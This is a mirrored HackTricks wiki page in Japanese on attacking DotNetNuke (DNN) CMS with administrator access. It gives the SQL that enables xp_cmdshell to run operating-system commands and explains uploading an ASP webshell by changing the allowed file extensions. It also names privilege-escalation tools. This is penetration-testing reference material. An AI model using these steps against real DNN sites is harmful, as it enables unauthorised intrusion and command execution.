maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/dotnetnuke-dnn.md

41 lines
1.4 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# DotNetNuke (DNN)
{{#include ../../banners/hacktricks-training.md}}
## DotNetNuke (DNN)
DNNに**管理者**としてログインすると、RCEを取得するのが簡単です。
## RCE
### SQL経由
**`Settings`**ページの下にSQLコンソールがアクセス可能で、**`xp_cmdshell`**を有効にして**オペレーティングシステムコマンドを実行**できます。
**`xp_cmdshell`**を有効にするには、これらの行を使用します:
```sql
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1'
RECONFIGURE
```
そして、**"Run Script"**を押して、そのSQL文を実行します。
次に、次のようなものを使用してOSコマンドを実行します
```sql
xp_cmdshell 'whoami'
```
### Via ASP webshell
`Settings -> Security -> More -> More Security Settings` で、`Allowable File Extensions` の下に **新しい許可された拡張子****追加** し、次に `Save` ボタンをクリックします。
**`asp`** または **`aspx`** を追加し、次に **`/admin/file-management`** で **`shell.asp`** という **asp webshell** をアップロードします。
その後、**`/Portals/0/shell.asp`** にアクセスして、webshell にアクセスします。
### Privilege Escalation
**Potatoes** または **PrintSpoofer** を使用して **権限を昇格** させることができます。
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink